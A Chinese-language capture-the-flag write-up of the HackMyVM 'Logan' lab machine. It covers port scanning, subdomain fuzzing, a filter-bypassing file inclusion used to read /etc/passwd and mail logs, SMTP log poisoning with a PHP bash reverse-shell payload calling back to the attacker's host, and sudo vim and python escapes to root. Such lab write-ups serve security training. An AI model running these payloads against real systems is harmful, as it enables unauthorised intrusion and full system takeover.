\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ rustscan -a 192.168.0.181 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.181:25\nOpen 192.168.0.181:80\nPORT STATE SERVICE REASON VERSION\n25\/tcp open smtp syn-ack Postfix smtpd\n| ssl-cert: Subject: commonName=logan\n| Subject Alternative Name: DNS:logan\n| Issuer: commonName=logan\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-07-03T13:46:49\n| Not valid after: 2033-06-30T13:46:49\n| MD5: 9b0d:3da4:7274:a99c:8b9e:705a:122f:249f\n| SHA-1: ef60:c55c:e4bf:e99a:c4bb:3281:f2c4:ded5:d44b:4801\n| -----BEGIN CERTIFICATE-----\n| MIIC7DCCAdSgAwIBAgIUAlr\/UnIZGJp5n3bGtfiPosfmoh4wDQYJKoZIhvcNAQEL\n| BQAwEDEOMAwGA1UEAwwFbG9nYW4wHhcNMjMwNzAzMTM0NjQ5WhcNMzMwNjMwMTM0\n| NjQ5WjAQMQ4wDAYDVQQDDAVsb2dhbjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\n| AQoCggEBALA1lkF4fnRQLkvBGoCsRJlInBrwk8yxe8jWue068b2Q7Ti3rNtGhf6G\n| Ze7FX1Yjb5NH1KTTcqumNb\/nAxv9hMl4Dc50MC2hSWq6qMnqOrkb+AI16bVuhYcm\n| SLGsuq7bPGflyhfoIK8Cj0xXvZS65D68pBhoZ\/7Oji5rGMfngnrcJ2Q36Ctimm8b\n| UK+exEWSgbC12xd2f\/noFWBPrB7EC5XHMYARVV6\/I17aajheOqEKBTDL0AkSqzKT\n| \/snWlz7vjMGjJsNIZ6o6wZUYxqXzFDXnInyQ7k+IPXcDDp7V3TOZAB6jQwZhdH2o\n| 1+CGuwBbCWvV+kAGvlTotL7k9RN5F\/cCAwEAAaM+MDwwCQYDVR0TBAIwADAQBgNV\n| HREECTAHggVsb2dhbjAdBgNVHQ4EFgQUeVAVq\/\/+vvbEd+bXwnPsAxY6HxAwDQYJ\n| KoZIhvcNAQELBQADggEBADScL3LqV9\/XFprgMf6GOz8y2lvbkOSADTvFHUQiBcqp\n| \/K\/LWCXRtHJVkJA5z5+IMAFWGfueBffgdZLnKtyCLfUtsMqqqoVR0BXlzPys1Jhm\n| Ri4Ra9KVvH7pxt69kD+3xk7Hz8jyHQVfXWGmPZ\/li6OOQxKei69CwDqTvcvjyNyc\n| lcix3P+eTIDcnWHFu2wkOew8+q7Mza7IzfIy6u3qs5Lqccv1fMDhDYMQ2j5iGEo9\n| SZMyBUTRqR2nmX8wuL6wYHcmvfWp0Px3bAXxaqz2p96W3XTqPECTJ45rcfRsdbFB\n| SIh86N9X05gerFhkaKhczHfR1hjtyUb1LltfRhbh7cY=\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n|_smtp-commands: logan.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n80\/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu))\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Site doesn't have a title (text\/html).\nService Info: Host: logan.hmv<\/code><\/pre>\n\u53d1\u73b0\u4e86\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff0c\u5c1d\u8bd5\u914d\u7f6e\uff1a<\/p>\n
192.168.0.181 logan.hmv<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ gobuster dir -u http:\/\/logan.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/logan.hmv\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,bak,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 274]\n\/index.html (Status: 200) [Size: 19038]\n\/images (Status: 301) [Size: 307] [--> http:\/\/logan.hmv\/images\/]\n\/.html (Status: 403) [Size: 274]\n\/css (Status: 301) [Size: 304] [--> http:\/\/logan.hmv\/css\/]\n\/js (Status: 301) [Size: 303] [--> http:\/\/logan.hmv\/js\/]\n\/javascript (Status: 301) [Size: 311] [--> http:\/\/logan.hmv\/javascript\/]\nProgress: 253809 \/ 1323366 (19.18%)[ERROR] Get "http:\/\/logan.hmv\/mpu.zip": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/logan.hmv\/28920.zip": context deadline exceeded (Client.Timeout exceeded while awaiting headers)<\/code><\/pre>\n\u6ca1\u53d1\u73b0\u5565\u6709\u7528\u7684\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u7f51\u7ad9\u5927\u6982\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s http:\/\/logan.hmv | html2text | uniq \n\n _Logan_S.A._\n * Home_(current)\n\n****** Logan\nSecurity\n Service ******\nWe are dedicated to protecting companies like you\n****** Logan\nSecurity\n Service ******\nWe are dedicated to protecting companies like you\n****** Logan\nSecurity\n Service ******\nWe are dedicated to protecting companies like you\nRead More\n===============================================================================\nPrevious Next\n\n**** ABOUT OUR COMPANY ****\nWe can protect your business both physically and technologically\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor\nincididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis\nnostrud exercitation ullamco\nRead More\n===============================================================================\n\n**** OUR SERVICES ****\nad minim veniam, quis nostrud exercitation ullamco\n* Tab Services *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n* Pipe Water *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n* Washing Machine *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n* Hand Washing *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n\n**** HOW IT WORKS ****\n* Adipiscing elit *\nRead More\n===============================================================================\n\n**** Booking Online ****\n[ ]\n[Unknown INPUT type]\n[ ]\n[One of: TYPE OF SERVICE\/Service 1\/Service 2\/Service 3]\n[ ]\n SEND\n\n**** What clients says ****\nIt is a very bad company, THEY STEALED OUR DATABASE.\nWe will hack you\n* LiveTech *\n\n***** Logan *****\nIt is a long established fact that a reader will be distracted by the readable\ncontent of a page when looking at its layout. The point of\n*** Navigation ***\n * Home\n * About\n * Services\n * Contact_Us\n * Login\n*** Contact Info ***\n* Corporate Office Address: *\n Loram ipusm New York, NY 36524\n* Customer Service: *\n ( +01 1234567890 )\n*** Discover ***\n * Help\n * How It Works\n * subscribe\n * Contact_Us\n\nCopyright \u00a9 2019 All Rights Reserved By Free_Html_Templates<\/code><\/pre>\n\u5c1d\u8bd5\u770b\u4e00\u4e0b\u76f8\u5173\u914d\u7f6e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ whatweb http:\/\/logan.hmv \nhttp:\/\/logan.hmv [200 OK] Apache[2.4.52], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.52 (Ubuntu)], IP[192.168.0.181], JQuery[3.4.1], Script[text\/javascript], Title[Logan], X-UA-Compatible[IE=edge]<\/code><\/pre>\n\u56e0\u4e3a\u8fd9\u662f\u4e00\u53f0\u6bd4\u8f83\u8001\u7684\u673a\u5668\uff0c\u4e0d\u4f18\u5148\u5c1d\u8bd5\u76f8\u5173\u7ec4\u4ef6\u6f0f\u6d1e\u4e86\u3002<\/p>\n
FUZZ\u57df\u540d<\/h3>\n
\u7ed9\u51fa\u7684\u57df\u540d\u6bd4\u8f83\u77ed\uff0c\u5c1d\u8bd5fuzz\u4e00\u4e0b\u770b\u770b\u662f\u5426\u6709\u5176\u4ed6\u6536\u83b7\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ ffuf -u http:\/\/192.168.0.181\/ -H 'HOST: FUZZ.logan.hmv' -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 5\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.181\/\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: FUZZ.logan.hmv\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response words: 5\n________________________________________________\n\nadmin [Status: 200, Size: 1112, Words: 300, Lines: 63, Duration: 649ms]<\/code><\/pre>\n\u6dfb\u52a0\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
192.168.0.181 admin.logan.hmv<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ gobuster dir -u http:\/\/admin.logan.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/admin.logan.hmv\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: html,php,zip,bak,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 280]\n\/.html (Status: 403) [Size: 280]\n\/index.html (Status: 200) [Size: 1112]\n\/upload.php (Status: 200) [Size: 306]\n\/javascript (Status: 301) [Size: 323] [--> http:\/\/admin.logan.hmv\/javascript\/]<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20\u7684\u4f4d\u7f6e\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6709\u6536\u83b7\uff0c\u53d1\u73b0\u4e86\u4e09\u4e2a\u7f51\u5740\uff1a<\/p>\n
http:\/\/admin.logan.hmv\/upload.php\nhttp:\/\/admin.logan.hmv\/clearlogs.php\nhttp:\/\/admin.logan.hmv\/payments.php<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u4e0a\u4f20\u4e86\uff0c\u4f46\u662f\u6ca1\u6709\u6536\u83b7\uff0c\u4e00\u76f4\u6ca1\u5f39\u56de\u6765\u3002\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\nLFI\u5229\u7528<\/h3>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\u53ef\u4ee5\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -i http:\/\/admin.logan.hmv\/upload.php\nHTTP\/1.1 200 OK\nDate: Fri, 28 Jun 2024 10:28:48 GMT\nServer: Apache\/2.4.52 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 306\nContent-Type: text\/html; charset=UTF-8\n\n<!DOCTYPE html>\n<html>\n<head>\n <meta charset="UTF-8">\n <title>Subir Archivos<\/title>\n<\/head>\n<body>\n <h1>Upload files<\/h1>\n <form action="upload.php" method="POST" enctype="multipart\/form-data">\n <input type="file" name="archivo">\n <input type="submit" value="upload">\n <\/form>\n<\/body>\n<\/html>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -i http:\/\/admin.logan.hmv\/payments.php \nHTTP\/1.1 200 OK\nDate: Fri, 28 Jun 2024 10:33:34 GMT\nServer: Apache\/2.4.52 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 294\nContent-Type: text\/html; charset=UTF-8\n\n<!DOCTYPE html>\n<html>\n<head>\n <meta charset="UTF-8">\n <title>Payments<\/title>\n<\/head>\n<body>\n <form method="POST">\n <label for="payments.php">Payment code (01,02,..):<\/label>\n <input type="text" id="file" name="file">\n <input type="submit" value="Show">\n <\/form>\n<\/body>\n<\/html><\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u4f20\u53c2\uff0c\u4e0a\u4f20\u754c\u9762\u6ca1\u6709\u5229\u7528\u70b9\uff0c\u4e0b\u9762\u7684\u67e5\u8be2\u754c\u9762\u5b58\u5728\u5229\u7528\u5730\u70b9\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=01' http:\/\/admin.logan.hmv\/payments.php | html2text\nCompany: Tinder\nDate: 02\/05\/2023\nAmount: 1000$\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=02' http:\/\/admin.logan.hmv\/payments.php | html2text\nCompany: LiveTech\nDate: 03\/05\/2023\nAmount: 60000$\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=03' http:\/\/admin.logan.hmv\/payments.php | html2text\nCompany: HackMyVm\nDate: 20\/05\/2023\nAmount: 500$\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=1' http:\/\/admin.logan.hmv\/payments.php | html2text\nFile does not exist\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=..\/..\/..\/..\/..\/..\/..\/etc\/passwd' http:\/\/admin.logan.hmv\/payments.php | html2text\nFile does not exist\nPayment code (01,02,..): [file ] [Show]<\/code><\/pre>\n\u53ef\u80fd\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd' http:\/\/admin.logan.hmv\/payments.php | html2text\nFile does not exist\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=....\/\/....\/\/....\/\/....\/\/....\/\/etc\/passwd' http:\/\/admin.logan.hmv\/payments.php | html2text \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/\nnologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/\nnologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/\nsbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsyslog:x:107:113::\/home\/syslog:\/usr\/sbin\/nologin\nuuidd:x:108:114::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:109:115::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:110:116:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nlandscape:x:111:117::\/var\/lib\/landscape:\/usr\/sbin\/nologin\nfwupd-refresh:x:112:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nusbmux:x:113:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nlogan:x:1000:1000:logan:\/home\/logan:\/bin\/bash\nlxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\npostfix:x:115:121::\/var\/spool\/postfix:\/usr\/sbin\/nologin\ndnsmasq:x:106:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nsshd:x:114:65534::\/run\/sshd:\/usr\/sbin\/nologin\nPayment code (01,02,..): [file ] [Show]<\/code><\/pre>\n\u4f46\u662f\u65e0\u6cd5\u8fdb\u884c\u5229\u7528\uff0c\u8054\u60f3\u5230\u524d\u9762\u7684\u654f\u611f\u7aef\u53e3\u5c1a\u672a\u8fdb\u884c\u5229\u7528\u3002<\/p>\n
\u654f\u611f\u7aef\u53e3\u5229\u7528<\/h3>\n
\u5f00\u653e\u4e8625\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ telnet 192.168.0.181 25 \nTrying 192.168.0.181...\nConnected to 192.168.0.181.\nEscape character is '^]'.\n220 logan.hmv ESMTP Postfix (Ubuntu)\n421 4.4.2 logan.hmv Error: timeout exceeded\nConnection closed by foreign host.<\/code><\/pre>\n\u8fd9\u610f\u5473\u7740\u8fd9\u4e2a\u90ae\u4ef6\u7aef\u53e3\u53ef\u4ee5\u8fdb\u884c\u4f7f\u7528\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u67e5\u8be2\u76f8\u5173\u65e5\u5fd7\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/mail.log' http:\/\/admin.logan.hmv\/payments.php | html2text\nJun 28 09:55:34 logan postfix\/postfix-script[1659]: starting the Postfix mail\nsystem\nJun 28 09:55:34 logan postfix\/master[1661]: daemon started -- version 3.6.4,\nconfiguration \/etc\/postfix\nJun 28 09:58:52 logan postfix\/smtpd[1681]: warning: hostname kali does not\nresolve to address 192.168.0.143: Temporary failure in name resolution\nJun 28 09:58:52 logan postfix\/smtpd[1681]: connect from unknown[192.168.0.143]\nJun 28 09:58:52 logan postfix\/smtpd[1681]: lost connection after CONNECT from\nunknown[192.168.0.143]\nJun 28 09:58:52 logan postfix\/smtpd[1681]: disconnect from unknown\n[192.168.0.143] commands=0\/0\nJun 28 09:59:22 logan postfix\/smtpd[1681]: connect from unknown[unknown]\nJun 28 09:59:22 logan postfix\/smtpd[1681]: lost connection after CONNECT from\nunknown[unknown]\nJun 28 09:59:22 logan postfix\/smtpd[1681]: disconnect from unknown[unknown]\ncommands=0\/0\nJun 28 09:59:22 logan postfix\/smtpd[1681]: warning: hostname kali does not\nresolve to address 192.168.0.143: Temporary failure in name resolution\n...........<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u6ce8\u5165\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ telnet 192.168.0.181 25\nTrying 192.168.0.181...\nConnected to 192.168.0.181.\nEscape character is '^]'.\n220 logan.hmv ESMTP Postfix (Ubuntu)\nMAIL FROM: hack\n250 2.1.0 Ok\nRCPT TO: <?php exec('bash -c "exec bash -i &>\/dev\/tcp\/192.168.0.143\/1234 <&1"');?> \n501 5.1.3 Bad recipient address syntax\n<\/code><\/pre>\n\u5c1d\u8bd5\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u4f7f\u7528\uff1a<\/p>\n
curl -s -i -X POST -d 'file=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/mail.log' http:\/\/admin.logan.hmv\/payments.php<\/code><\/pre>\n\u53d1\u73b0\u53cd\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u8fd9\u91cc\u5982\u679c\u5c1d\u8bd5\u8fc7\u591a\u6ca1\u6709\u5f39\u56de\u6765\u53ef\u80fd\u662f\u56e0\u4e3a\u65e5\u5fd7\u88ab\u6c61\u67d3\u4e86\uff0c\u91cd\u542f\u9776\u673a\u518d\u8bd5\u4e00\u6b21\u5c31\u597d\u4e86\u3002<\/code><\/pre>\n\u63d0\u6743<\/h2>\nvim\u63d0\u6743\u7528\u6237<\/h3>\n(remote) www-data@logan:\/var\/www\/admin$ sudo -l\nMatching Defaults entries for www-data on logan:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser www-data may run the following commands on logan:\n (logan) NOPASSWD: \/usr\/bin\/vim\n\n(remote) www-data@logan:\/var\/www\/admin$ sudo -u logan \/usr\/bin\/vim -c ':!\/bin\/bash'\n\nlogan@logan:\/var\/www\/admin$ whoami;id\nlogan\nuid=1000(logan) gid=1000(logan) groups=1000(logan),27(sudo),1002(administration)\nlogan@logan:\/var\/www\/admin$ cd ~\nlogan@logan:~$ ls -la\ntotal 36\ndrwxr-xrwx 4 logan logan 4096 Jul 18 2023 .\ndrwxr-xr-x 3 root root 4096 Jul 17 2023 ..\nlrwxrwxrwx 1 root root 9 Jul 17 2023 .bash_history -> \/dev\/null\n-rw-r--r-x 1 logan logan 220 Jan 6 2022 .bash_logout\n-rw-r--r-x 1 logan logan 3771 Jan 6 2022 .bashrc\ndrwx---r-x 2 logan logan 4096 Jul 3 2023 .cache\ndrwxrwxr-x 3 logan logan 4096 Jul 17 2023 .local\n-rw-r--r-x 1 logan logan 807 Jan 6 2022 .profile\n-rw-r--r-x 1 logan logan 0 Jul 3 2023 .sudo_as_admin_successful\n-rw-r--r-- 1 1002 1003 68 Jul 17 2023 to-do\n-rw-r--r-- 1 logan logan 16 Jul 17 2023 user.txt\nlogan@logan:~$ cat user.txt \nUser: ilovelogs\nlogan@logan:~$ cat to-do \n- Go outside\n- Try the new script that gave me root to learn python\nlogan@logan:~$ sudo -l\nMatching Defaults entries for logan on logan:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser logan may run the following commands on logan:\n (root) NOPASSWD: \/usr\/bin\/python3 \/opt\/learn_some_python.py\nlogan@logan:~$ ls -la \/opt\/learn_some_python.py\n-rw------- 1 root root 132 Jul 18 2023 \/opt\/learn_some_python.py\nlogan@logan:~$ sudo \/usr\/bin\/python3 \/opt\/learn_some_python.py\nWelcome!!!\n\n The first you need to now is how to use print, please type print('hello')\n\naaaaaaaaa\nTraceback (most recent call last):\n File "\/opt\/learn_some_python.py", line 3, in <module>\n exec(comand)\n File "<string>", line 1, in <module>\nNameError: name 'aaaaaaaaa' is not defined\nlogan@logan:~$ sudo \/usr\/bin\/python3 \/opt\/learn_some_python.py\nWelcome!!!\n\n The first you need to now is how to use print, please type print('hello')\n\nprint('hello') \nhello<\/code><\/pre>\n\u6267\u884cpython\u4ee3\u7801\u63d0\u6743root<\/h3>\n
\u53d1\u73b0\u4f1a\u6267\u884cpython\u4ee3\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6267\u884c\u63d0\u6743\u4ee3\u7801\uff1a<\/p>\n
logan@logan:~$ sudo \/usr\/bin\/python3 \/opt\/learn_some_python.py\nWelcome!!!\n\n The first you need to now is how to use print, please type print('hello')\n\nimport os; os.system("\/bin\/bash")\nroot@logan:\/home\/logan# cd ~\nroot@logan:~# ls -la\ntotal 48\ndrwx------ 5 root root 4096 Jul 17 2023 .\ndrwxr-xr-x 19 root root 4096 Jul 3 2023 ..\nlrwxrwxrwx 1 root root 9 Jul 17 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc\ndrwx------ 3 root root 4096 Jul 3 2023 .launchpadlib\n-rw------- 1 root root 20 Jul 17 2023 .lesshst\ndrwxr-xr-x 3 root root 4096 Jul 3 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw-r--r-- 1 root root 66 Jul 4 2023 .selected_editor\n-rw-r--r-- 1 root root 0 Jul 3 2023 .sudo_as_admin_successful\n-rw------- 1 root root 985 Jul 17 2023 .viminfo\n-rw-r--r-- 1 root root 169 Jul 3 2023 .wget-hsts\n-rw-r--r-- 1 root root 17 Jul 17 2023 root.txt\ndrwx------ 3 root root 4096 Jul 4 2023 snap\nroot@logan:~# cat root.txt \nRoot: siuuuuuuuu<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/tao0845.github.io\/2024\/04\/24\/HackMyVM-Logan\/<\/a><\/p>\nhttps:\/\/blank-ms1.github.io\/posts\/Logan-HackMyVm\/<\/a><\/p>\n
![\"image-20240628182452069\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282002043.png\")
<\/div><\/p>\n![\"image-20240628182814898\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282002044.png\")
<\/div><\/p>\n![\"image-20240628195224125\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282002045.png\")
<\/div><\/p>\n